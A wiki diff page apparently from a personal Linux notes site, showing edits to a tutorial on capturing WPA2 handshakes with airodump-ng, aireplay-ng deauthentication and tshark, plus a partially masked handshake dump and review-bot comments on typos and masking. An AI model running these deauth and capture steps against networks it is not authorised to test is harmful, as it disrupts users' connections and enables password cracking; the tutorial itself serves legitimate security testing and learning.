Ben's notes

Linux, Unix, network, radio...


capture_wpa_handshake

Differences

This shows you the differences between two versions of the page.

capture_wpa_handshake [2014/06/12 20:08] admin
capture_wpa_handshake [2021/10/09 15:14] (current) – external edit 127.0.0.1
Line 1: Line 1:
 {{tag>[security crack wpa wpa2 handshake kali]}} {{tag>[security crack wpa wpa2 handshake kali]}}
-~~TOC~~ 
  
 =====Capture WPA2 handshake===== =====Capture WPA2 handshake=====
Line 101: Line 100:
 [*] anonce: [*] anonce:
     3B 00 01 41 3D 46 19 79 80 E6 90 E6 AB 3C DB 07     3B 00 01 41 3D 46 19 79 80 E6 90 E6 AB 3C DB 07
-    99 5B 29 78 B5 FF DB 5B 35 CC 2B 53 C0 50 A0 45+    -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 
 [*] snonce: [*] snonce:
     C6 0A 60 A0 05 03 AF CE FC E4 E7 24 72 4A 24 AC     C6 0A 60 A0 05 03 AF CE FC E4 E7 24 72 4A 24 AC
-    DA 9B 56 4E 9B 16 27 49 8B 65 A4 D3 D9 64 96 4E+    -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 
 [*] Key MIC: [*] Key MIC:
     AD 60 F8 4B 42 B1 CF E7 9F 82 97 0D 11 B7 CC F1     AD 60 F8 4B 42 B1 CF E7 9F 82 97 0D 11 B7 CC F1
 [*] eapol: [*] eapol:
     01 03 00 75 02 01 0A 00 10 00 00 00 00 00 00 00     01 03 00 75 02 01 0A 00 10 00 00 00 00 00 00 00
-    01 C6 0A 60 A0 05 03 AF CE FC E4 E7 24 72 4A 24 +    -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --  
-    AC DA 9B 56 4E 9B 16 27 49 8B 65 A4 D3 D9 64 96+    -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 
     4E 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00     4E 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-    00 00 16 30 14 01 00 00 0F AC 04 01 00 00 0F AC+    -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 
     04 01 00 00 0F AC 02 0C 00     04 01 00 00 0F AC 02 0C 00
  
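Review bot: The masking in the eapol dump is inconsistent with the snonce block above it: the two masked eapol rows hid `C6 0A 60 A0 05 03 AF ...`, but the same bytes are still printed in clear on the first snonce row, and the trailing `4E` of the masked second snonce row is left visible at the start of the next eapol row. Either mask those as well or leave the eapol rows intact, and add a sentence near the dump saying that `--` marks bytes removed from the sample, since `--` is not valid hex and a reader may take it for tool output.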
Line 167: Line 166:
 wlan0 Intel 6235 iwlwifi - [phy0] wlan0 Intel 6235 iwlwifi - [phy0]
  (monitor mode enabled on mon0)</code>  (monitor mode enabled on mon0)</code>
-  * Find nearest wireless networks. <code># airodump-ng mon0+  * Find nearest wireless networks. If targetting specific AP, fix channel with '-c <chan_num>' <code># airodump-ng mon0
  CH  8 ][ Elapsed: 1 min ][ 2014-06-12 21:06  CH  8 ][ Elapsed: 1 min ][ 2014-06-12 21:06
  
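Review bot: The sentence added to the "Find nearest wireless networks" step names '-c <chan_num>', but the command shown right after it is still `# airodump-ng mon0`, and the later dump step spells the channel option `--channel 11`. Use one spelling in both steps and either show the option in the command or say that it belongs on the later dump step. "targetting" should also be "targeting".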
Line 205: Line 204:
  14:49:E0:A4:70:28  C0:CB:38:01:1D:31   -1    1e- 0      0        1  14:49:E0:A4:70:28  C0:CB:38:01:1D:31   -1    1e- 0      0        1
  C4:27:95:75:D8:95  00:22:FA:96:D5:0C  -82    0 - 6e            4</code>  C4:27:95:75:D8:95  00:22:FA:96:D5:0C  -82    0 - 6e            4</code>
-  * Dump packets from target channel. <code># airodump-ng --channel 11 --write channel11 mon0</code>+  * Dump packets from target channel. <code># airodump-ng --channel 11 --bssid 00:11:22:33:44:55 --write channel11 mon0</code>
   * Wait for handshake... or   * Wait for handshake... or
   * Deauthenticate client from network. <code># aireplay-ng --deauth 0 -a <AP_MAC> -c <CLIENT_MAC> mon0</code>   * Deauthenticate client from network. <code># aireplay-ng --deauth 0 -a <AP_MAC> -c <CLIENT_MAC> mon0</code>
   * Or if you don't know the MAC of any associated client, broadcast a deauth. <code># aireplay-ng --deauth 0 -a <AP_MAC> mon0</code>   * Or if you don't know the MAC of any associated client, broadcast a deauth. <code># aireplay-ng --deauth 0 -a <AP_MAC> mon0</code>
   * Extract handshakes. <code>tshark -r <input file name> -R eapol || wlan.fc.type_subtype == 0×88 -w <output file name></code>   * Extract handshakes. <code>tshark -r <input file name> -R eapol || wlan.fc.type_subtype == 0×88 -w <output file name></code>
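Review bot: The new `--bssid 00:11:22:33:44:55` on the dump step is a hard-coded sample address, while the steps after it use the placeholder `<AP_MAC>`; writing `--bssid <AP_MAC>` keeps the list consistent and avoids the sample value being pasted as-is. While this list is being edited, the tshark line at the end of it has an unquoted filter `eapol || wlan.fc.type_subtype == 0×88`, which the shell would split at `||`, and `0×88` carries a multiplication sign where `0x88` is meant; quote the filter and fix the character.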
capture_wpa_handshake.txt · Last modified: 2021/10/09 15:14 by 127.0.0.1